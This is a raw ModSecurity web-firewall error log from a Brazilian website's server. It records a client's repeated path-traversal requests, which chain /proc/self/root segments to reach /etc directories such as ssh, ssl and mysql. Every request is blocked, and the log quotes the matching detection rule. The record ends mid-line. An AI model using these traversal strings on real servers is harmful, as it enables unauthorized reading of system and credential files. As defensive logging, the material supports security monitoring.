https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:46:49.178201 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:36292] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abub2eoXxyEfFpUF8f_XAQAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:46:50.479056 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.241.31:36296] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abub2sdf6f5d65gmYZQ4swAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:46:51.770555 2026] [:error] [pid 27403:tid 140411691570944] [client 74.7.241.31:36304] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abub2xkFeYa1D6dYQnCyagAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:46:53.058266 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:36308] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abub3eoXxyEfFpUF8f_XAgAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:46:54.331152 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:36316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abub3uoXxyEfFpUF8f_XBAAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:46:55.699259 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.244.43:56728] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abub3wkwaGbbGflqUZB5wAAAAM4"]
[Thu Mar 19 03:47:01.107305 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:36318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abub5QkwaGbbGflqUZB5zAAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:47:02.626315 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:34914] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abub5uyqAr6etmhZHNop_gAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:47:05.079490 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.241.31:34918] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abub6QbLMZ6AikZjR9UjCQAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:47:06.415106 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.241.31:34926] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abub6uyqAr6etmhZHNoqBQAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:47:13.185386 2026] [:error] [pid 19093:tid 140411674785536] [client 74.7.241.31:35192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abub8F_V7PWP6ixUYl6BnAAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:47:17.927507 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:35198] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abub9eoXxyEfFpUF8f_XDwAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:47:20.563145 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:53646] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abub9-oXxyEfFpUF8f_XEAAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:47:22.103650 2026] [:error] [pid 27403:tid 140411716749056] [client 74.7.241.31:53652] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abub-hkFeYa1D6dYQnCyigAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:47:27.690450 2026] [:error] [pid 14269:tid 140411540502272] [client 74.7.241.31:53656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abub_gbLMZ6AikZjR9UjFwAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:47:29.044264 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:41366] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucAQkwaGbbGflqUZB55AAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:47:31.487646 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:41370] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucA9a6ubjKNq_cu4YEYAAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:47:32.786963 2026] [:error] [pid 27403:tid 140411691570944] [client 74.7.241.31:41386] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucBBkFeYa1D6dYQnCyjAAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:47:36.406991 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.241.31:41388] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucCBkFeYa1D6dYQnCykgAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:47:37.710015 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.241.31:36078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucCQkwaGbbGflqUZB57wAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:47:40.132934 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.241.31:36084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucDOyqAr6etmhZHNoqIgAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:47:41.794736 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.241.31:36088] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 